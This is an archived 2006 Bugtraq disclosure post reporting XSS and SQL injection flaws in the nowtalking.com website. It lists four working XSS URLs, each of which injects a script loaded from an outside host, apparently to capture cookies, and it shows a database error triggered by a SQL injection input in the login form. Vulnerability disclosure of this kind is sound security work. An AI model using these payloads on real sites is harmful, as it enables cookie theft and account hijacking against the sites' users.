| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 10 Jun 2006 22:55:33 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Nowtalking.com - XSS Nowtalking.com Homepage: http://www.nowtalking.com Effected files: input boxes of logging in and searching friends-new.asp gallery.asp friends.asp gb.asp JET DB error due to injection: Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'UserName = '' or ''''. /login.asp, line 61 --------------------------------------- Friends-New.asp XSS vulnerability: It seems our cookie data is output on the screen via this XSS vuln: http://www.nowtalking.com/login/friends-new.asp?friendname=<script%20src=http://www.youfucktard.com/xss.js></script>&friendnumber=9 Screenshot: http://www.youfucktard.com/xsp/nt1.jpg -------------------------------------- Gallery.asp XSS vulnerability, this time by changing the usernumber to a negative #: http://www.nowtalking.com/login/gallery.asp?username=[script src=http://www.youfucktard.com/xss.js]</script>&usernumber=-78 Screenshot:http://www.youfucktard.com/xsp/nt2.jpg ----------------------------------- Friends.asp XSS Vuln, again with changing usernumber to a negative: http://www.nowtalking.com/login/friends.asp?usernumber=-9&username=<script%20src=http://www.youfucktard.com/xss.js></script> Screenshot: http://www.youfucktard.com/xsp/nt3.jpg ---------------------------------- Gb.asp XSS Vulnerability: http://www.nowtalking.com/login/gb.asp?username=<script%20src=http://www.youfucktard.com/xss.js></script>&usernumber=-9 Screenshot: http://www.youfucktard.com/xsp/nt4.jpg -----------------------------------
Powered by blists - more mailing lists